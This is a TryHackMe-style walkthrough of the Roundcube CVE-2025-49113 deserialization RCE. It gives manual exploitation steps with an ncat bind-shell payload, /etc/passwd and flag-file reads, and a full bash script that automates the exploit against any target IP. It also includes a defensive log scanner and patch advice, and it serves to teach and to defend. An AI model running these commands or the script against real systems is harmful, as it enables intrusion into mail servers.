Roundcube RCE Vulnerability Explained [CVE-2025-49113] - TryHackMe Walkthrough

Waseem Akram
Researcher, Pentester, Dev
2025-06-21
5 min read

Introduction

Roundcube is a free and open-source webmail software used by thousands of hosting providers and organizations around the world. It supports more than 80 languages, is highly extensible, and integrates well with various SQL backends. But even the most trusted tools can have cracks in their armor.

Recently, a critical vulnerability (CVE-2025-49113) was discovered in Roundcube versions 1.5.x and 1.6.x (prior to 1.5.10 and 1.6.11). This flaw allows authenticated remote code execution (RCE) via insecure PHP object deserialization. With a CVSS score of 9.9, this vulnerability is a ticking time bomb for any unpatched installation.

In this blog post, we’ll:

  • Break down what causes this vulnerability
  • Walk through the manual exploitation
  • Showcase an automated exploit script
  • Provide insights from a TryHackMe-style vulnerable lab

What Is CVE-2025-49113?

🔍 The Root Cause

The vulnerability stems from the upload.php endpoint in Roundcube, which mishandles the _from parameter by deserializing it without first validating that it contains only safe data. If an attacker supplies crafted serialized PHP data, it is deserialized and acted upon, leading to arbitrary code execution on the target.

📦 Affected Versions

  • All 1.5.x before 1.5.10
  • All 1.6.x before 1.6.11

The issue was identified by Kirill Firsov, and the patch commits clearly show the added input validation: rcube_utils::is_simple_string() is now used to check the _from parameter before it is used.

Manual Exploitation

Let’s walk through how this exploit works in a lab using TryHackMe:

🛠 Environment Setup

  • Roundcube version: 1.6.10
  • Credentials:
    • Username: ellieptic
    • Password: ChangeMe123
  • URL: http://MACHINE_IP/roundcube

🔓 Step-by-Step Exploitation

  1. Log in to Roundcube with the provided credentials.
  2. Clone the exploit PoC:
    git clone https://github.com/fearsoff-org/CVE-2025-49113
    cd CVE-2025-49113
  3. Inspect the script: CVE-2025-49113.php
    • It retrieves a CSRF token and session cookie.
    • It crafts a malicious serialized payload.
    • It injects that payload into the _from parameter.
    • Sends a POST request to upload.php.
  4. Launch the exploit:
    php CVE-2025-49113.php http://MACHINE_IP/roundcube ellieptic ChangeMe123 "ncat -lvnp 4444 -e /bin/bash"
  5. Connect via netcat:
    nc MACHINE_IP 4444
    If the terminal appears to hang, that's a good sign: the shell is connected. Type pwd or whoami to verify shell access.

Post-Exploitation Findings

👤 Maggie's Last Name

You can find user details from /etc/passwd:

grep -i maggie /etc/passwd

Output:

maggie****:x:1002:1002:Maggie ****,,,:/home/maggie****:/bin/bash

Answer: Redacted

🚩 Flag Location

To find flags, try:

find /etc -type f -iname '*flag*' -exec cat {} +

Automating the Exploit

To speed things up, we created a fully automated Bash script that:

  • Clones the exploit
  • Runs it with a payload
  • Connects to the bind shell
  • Grabs Maggie’s last name
  • Dumps any /etc/ flag files

💻 Script: roundcube_exploit.sh

The complete automated exploit script is available on GitHub as roundcube-exploit.sh and is reproduced below.

#!/bin/bash
 
# Roundcube CVE-2025-49113 Exploit + Post Exploitation Automation
# Author: Waseem Akram(hackerwasii)
# Purpose: Shell, sniff Maggie, snag the flag
 
# ----------------------------
# CONFIGURATION
# ----------------------------
MACHINE_IP="$1"
USERNAME="username"  # Replace with actual username
PASSWORD="password"  # Replace with actual password
PORT=4444
EXPLOIT_DIR="CVE-2025-49113"
EXPLOIT_REPO="https://github.com/fearsoff-org/CVE-2025-49113.git"
EXPLOIT_FILE="CVE-2025-49113.php"
TARGET_URL="http://$MACHINE_IP/roundcube"
SHELL_PAYLOAD="ncat -lvnp $PORT -e /bin/bash"
 
# ----------------------------
# PRECHECKS
# ----------------------------
if [ -z "$MACHINE_IP" ]; then
  echo "[!] Usage: $0 <MACHINE_IP>"
  exit 1
fi
 
for tool in php git nc grep; do
  if ! command -v $tool &>/dev/null; then
    echo "[!] Missing required tool: $tool"
    exit 2
  fi
done
 
echo "[*] Launching exploit on Roundcube at $TARGET_URL..."
 
# ----------------------------
# CLONE EXPLOIT REPO
# ----------------------------
if [ ! -d "$EXPLOIT_DIR" ]; then
  echo "[*] Cloning PoC repo..."
  git clone "$EXPLOIT_REPO" || { echo "[!] Git clone failed."; exit 3; }
fi
 
cd "$EXPLOIT_DIR" || exit
 
# ----------------------------
# RUN EXPLOIT
# ----------------------------
echo "[*] Executing exploit..."
php "$EXPLOIT_FILE" "$TARGET_URL" "$USERNAME" "$PASSWORD" "$SHELL_PAYLOAD" &
EXPLOIT_PID=$!
 
# ----------------------------
# WAIT FOR BIND SHELL TO SPAWN
# ----------------------------
sleep 6
 
echo "[*] Connecting to bind shell on port $PORT..."
(
  sleep 1
  echo "whoami"
  sleep 1
  echo "pwd"
  sleep 1
  echo "echo '📜 Searching /etc/passwd for Maggie...'"
  echo "grep -i maggie /etc/passwd"
  sleep 1
  echo "echo '🚩 Searching for flags in /etc...'"
  echo "find /etc -type f -iname '*flag*' 2>/dev/null | while read f; do echo \"--- Flag in: \$f ---\"; cat \"\$f\"; done"
  sleep 1
  echo "echo '🤠 Done. Ride safe, partner.'"
  sleep 2
) | nc "$MACHINE_IP" "$PORT"
 
# ----------------------------
# CLEANUP
# ----------------------------
kill $EXPLOIT_PID &>/dev/null
 
echo "[*] Script complete. If you saw Maggie’s last name and the flag, yer good to ride off into the sunset."
echo "[*] Remember to patch Roundcube ASAP!"
exit 0
# End of script

Mitigation & Recommendations

  • Patch Immediately: Upgrade to 1.5.10 or 1.6.11.
  • Disable upload.php if the feature is unused.
  • Monitor traffic to upload.php for strange _from parameters.
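The third recommendation in practice, as an added example that is not part of the original post or of the Roundcube project: a small Python scanner that reads web-server access-log lines, picks out requests to the upload endpoint, and flags any _from value that is not a plain identifier, modelling the "simple string" rule the patch introduced. The log lines are constructed, the character set used for "simple string" is an assumption rather than the exact definition of rcube_utils::is_simple_string(), and the upload.php path is taken from the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not real traffic): line 2 carries a percent-encoded PHP
# serialized object in _from, line 3 is not an upload request, line 4 is merely not simple.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jun/2025:10:01:12 +0000] "POST /roundcube/upload.php?_from=compose HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Jun/2025:10:02:40 +0000] "POST /roundcube/upload.php?_from=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22x%22%3Bi%3A1%3B%7D HTTP/1.1" 200 128 "-" "curl/8.0"
10.0.0.9 - - [21/Jun/2025:10:02:41 +0000] "GET /roundcube/?_task=mail&_from=O%3A8%3A%22stdClass%22 HTTP/1.1" 200 128 "-" "curl/8.0"
10.0.0.7 - - [21/Jun/2025:10:03:02 +0000] "POST /roundcube/upload.php?_from=compose%3Bid HTTP/1.1" 200 128 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')
# Assumption: a "simple string" is letters, digits and _ . @ - only; Roundcube's own
# rcube_utils::is_simple_string() may use a slightly different character set.
SIMPLE_RE = re.compile(r'[A-Za-z0-9_.@-]+')
# PHP serialization tokens such as O:8:"stdClass", a:1:{ or s:3:"abc"
SERIALIZED_RE = re.compile(r'\b[OCas]:\d+:')

def parse_request(line):
    """Split one access-log line into ip, method, path and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    return {'ip': m.group('ip'), 'method': m.group('method'), 'path': parts.path,
            'params': parse_qs(parts.query, keep_blank_values=True)}

def classify_from(value):
    """'serialized' for PHP-serialized data, 'suspicious' for any other non-simple string."""
    if SERIALIZED_RE.search(value):
        return 'serialized'
    if not SIMPLE_RE.fullmatch(value):
        return 'suspicious'
    return 'ok'

def scan_log(text):
    """Return (ip, path, verdict, value) for each upload request whose _from is not clean."""
    findings = []
    for line in text.splitlines():
        req = parse_request(line)
        # Watch upload.php (as named in the post) and Roundcube's _action=upload form.
        if req is None or not (req['path'].endswith('/upload.php')
                               or 'upload' in req['params'].get('_action', [])):
            continue
        for value in req['params'].get('_from', []):
            verdict = classify_from(value)
            if verdict != 'ok':
                findings.append((req['ip'], req['path'], verdict, value))
    return findings
```

Only query-string parameters reach a standard access log; a _from value carried in the POST body needs request-body logging or a WAF rule that applies the same check.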

Final Thoughts

This vulnerability is a great example of how dangerous PHP object deserialization can be when mishandled. While the exploit requires valid credentials, many shared hosting environments with weak passwords could be easily compromised.

Always audit your dependencies, stay updated, and sanitize all user inputs — especially those being deserialized.

🔐 Quick Recap for TryHackMe Users

  1. Log in as ellieptic
  2. Clone & run exploit
  3. Connect via netcat
  4. Dump /etc/passwd for Maggie's last name
  5. Read flag from /etc/

If you found this post helpful, please share it with your network. Together, we can make the web a safer place!
